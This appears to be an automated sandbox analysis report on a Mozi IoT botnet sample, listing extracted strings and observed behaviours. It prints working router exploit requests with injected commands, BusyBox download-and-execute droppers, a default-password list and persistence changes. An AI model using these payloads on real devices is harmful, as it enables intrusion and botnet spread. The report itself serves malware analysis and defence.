Source: MGuvcs6Ocz	String found in binary or memory: http://%s:%d/Mozi.a;chmod
Source: MGuvcs6Ocz	String found in binary or memory: http://%s:%d/Mozi.a;sh$
Source: MGuvcs6Ocz	String found in binary or memory: http://%s:%d/Mozi.m
Source: MGuvcs6Ocz	String found in binary or memory: http://%s:%d/Mozi.m;
Source: MGuvcs6Ocz	String found in binary or memory: http://%s:%d/Mozi.m;$
Source: MGuvcs6Ocz	String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
Source: MGuvcs6Ocz	String found in binary or memory: http://%s:%d/bin.sh
Source: MGuvcs6Ocz	String found in binary or memory: http://%s:%d/bin.sh;chmod
Source: MGuvcs6Ocz	String found in binary or memory: http://127.0.0.1
Source: MGuvcs6Ocz	String found in binary or memory: http://127.0.0.1sendcmd
Source: MGuvcs6Ocz	String found in binary or memory: http://HTTP/1.1
Source: MGuvcs6Ocz	String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
Source: .config.8.dr	String found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
Source: MGuvcs6Ocz	String found in binary or memory: http://ipinfo.io/ip
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://pastebin.ca)
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
Source: MGuvcs6Ocz	String found in binary or memory: http://purenetworks.com/HNAP1/
Source: MGuvcs6Ocz	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: MGuvcs6Ocz	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: MGuvcs6Ocz	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.alsa-project.org
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.alsa-project.org.
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.alsa-project.org/alsa-info.sh
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.alsa-project.org/cardinfo-db/
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.pastebin.ca
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.pastebin.ca.
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.pastebin.ca/upload.php

Spam, unwanted Advertisements and Ransom Demands:

Writes HTML files containing JavaScript to disk

Source: /tmp/MGuvcs6Ocz (PID: 4599)

HTML file containing JavaScript created: /usr/networks

Jump to dropped file

System Summary:

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Source: Initial sample	String containing 'busybox' found: busybox
Source: Initial sample	String containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
Source: Initial sample	String containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
Source: Initial sample	String containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
Source: Initial sample	String containing 'busybox' found: /bin/busybox cat /bin/ls|more
Source: Initial sample	String containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
Source: Initial sample	String containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
Source: Initial sample	String containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
Source: Initial sample	String containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample	String containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>

Sample contains strings indicative of password brute-forcing capabilities

Source: Initial sample	String containing potential weak password found: admin
Source: Initial sample	String containing potential weak password found: default
Source: Initial sample	String containing potential weak password found: support
Source: Initial sample	String containing potential weak password found: service
Source: Initial sample	String containing potential weak password found: supervisor
Source: Initial sample	String containing potential weak password found: guest
Source: Initial sample	String containing potential weak password found: administrator
Source: Initial sample	String containing potential weak password found: 123456
Source: Initial sample	String containing potential weak password found: 54321
Source: Initial sample	String containing potential weak password found: password
Source: Initial sample	String containing potential weak password found: 12345
Source: Initial sample	String containing potential weak password found: admin1234

Sample contains strings that are potentially command strings

Source: Initial sample	Potential command found: POST /cdn-cgi/
Source: Initial sample	Potential command found: GET /c HTTP/1.0
Source: Initial sample	Potential command found: POST /cdn-cgi/ HTTP/1.1
Source: Initial sample	Potential command found: GET %s HTTP/1.1
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: Initial sample	Potential command found: rm /home/httpd/web_shell_cmd.gch
Source: Initial sample	Potential command found: echo 3 > /usr/local/ct/ctadmincfg
Source: Initial sample	Potential command found: mount -o remount,rw /overlay /
Source: Initial sample	Potential command found: mv -f %s %s
Source: Initial sample	Potential command found: iptables -I INPUT -p udp --destination-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I INPUT -p udp --dport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I OUTPUT -p udp --sport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
Source: Initial sample	Potential command found: GET /c
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
Source: Initial sample	Potential command found: killall -9 %s
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 22 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 23 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 2323 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 22 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 23 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 22 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 23 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 2323 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 22 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 23 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 2323 -j DROP
Source: Initial sample	Potential command found: killall -9 telnetd utelnetd scfgmgr
Source: Initial sample	Potential command found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
Source: Initial sample	Potential command found: GET /Mozi.6 HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.7 HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.c HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.m HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.x HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.a HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.s HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.r HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.b HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.4 HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.k HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.l HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.p HTTP/1.0
Source: Initial sample	Potential command found: GET /%s HTTP/1.1
Source: Initial sample	Potential command found: POST /%s HTTP/1.1
Source: Initial sample	Potential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample	Potential command found: POST /picsdesc.xml HTTP/1.1
Source: Initial sample	Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: Initial sample	Potential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: Initial sample	Potential command found: POST /UD/act?1 HTTP/1.1
Source: Initial sample	Potential command found: POST /HNAP1/ HTTP/1.0
Source: Initial sample	Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: Initial sample	Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
Source: Initial sample	Potential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
Source: Initial sample	Potential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
Source: Initial sample	Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron

Sample has stripped symbol table

Source: ELF static info symbol of initial sample

.symtab present: no

Yara signature match

Source: MGuvcs6Ocz, type: SAMPLE	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: /usr/networks, type: DROPPED	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =

Classification label

Source: classification engine

Classification label: mal100.spre.troj.evad.lin@0/221@4/0

Persistence and Installation Behavior:

Executes the "iptables" command to insert, remove and/or manipulate rules

Source: /bin/sh (PID: 4637)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 44343 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4671)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 44343 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4674)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 44343 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4715)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 44343 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4739)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 44343 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4758)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 44343 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4776)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 44343 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4795)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 44343 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4898)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4915)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4918)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4921)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4949)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4975)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4999)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5024)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5051)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5077)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5103)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5124)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5128)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5131)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5142)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5167)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5220)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 7723 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5223)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 7723 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5236)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 7723 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5267)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 7723 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5295)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 7723 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5299)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 7723 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5309)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 7723 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5337)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 7723 -j ACCEPT			Jump to behavior

Sample reads /proc/mounts (often used for finding a writable filesystem)

Source: /tmp/MGuvcs6Ocz (PID: 4599)

File: /proc/4599/mounts

Jump to behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/MGuvcs6Ocz (PID: 4599)	File: /etc/profile.d/cedilla-portuguese.sh			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 4599)	File: /etc/profile.d/apps-bin-path.sh			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 4599)	File: /etc/profile.d/Z97-byobu.sh			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 4599)	File: /etc/profile.d/bash_completion.sh			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 4599)	File: /etc/profile.d/vte-2.91.sh			Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/MGuvcs6Ocz (PID: 4599)	File: /etc/rcS.d/S95baby.sh			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 4599)	File: /etc/rc.local			Jump to behavior

Terminates several processes with shell command 'killall'

Source: /bin/sh (PID: 4603)

Killall command executed: killall -9 telnetd utelnetd scfgmgr

Jump to behavior

Enumerates processes within the "proc" file system

Source: /usr/bin/killall (PID: 4603)	File opened: /proc/4290/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/230/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/231/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/232/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/233/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/234/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/3512/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/359/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/1452/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/3632/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/4601/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/3518/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/10/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/1339/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/11/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/12/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/13/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/14/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/15/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/16/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/17/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/18/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/19/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/483/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/3527/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/3527/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/1/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/2/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/3525/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/3/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/1346/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/3524/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/3524/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/4/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/3523/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/5/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/7/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/8/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/9/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/20/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/21/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/22/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/23/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/24/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/25/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/28/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/29/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/1363/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/3541/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/3541/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/1362/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/496/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/496/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/30/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/31/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/31/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/1119/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/3790/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/3791/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/3310/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/3431/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/3431/cmdline			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/3550/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/260/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/263/stat			Jump to behavior
Source: /usr/bin/killall (PID: 4603)	File opened: /proc/264/stat			Jump to behavior
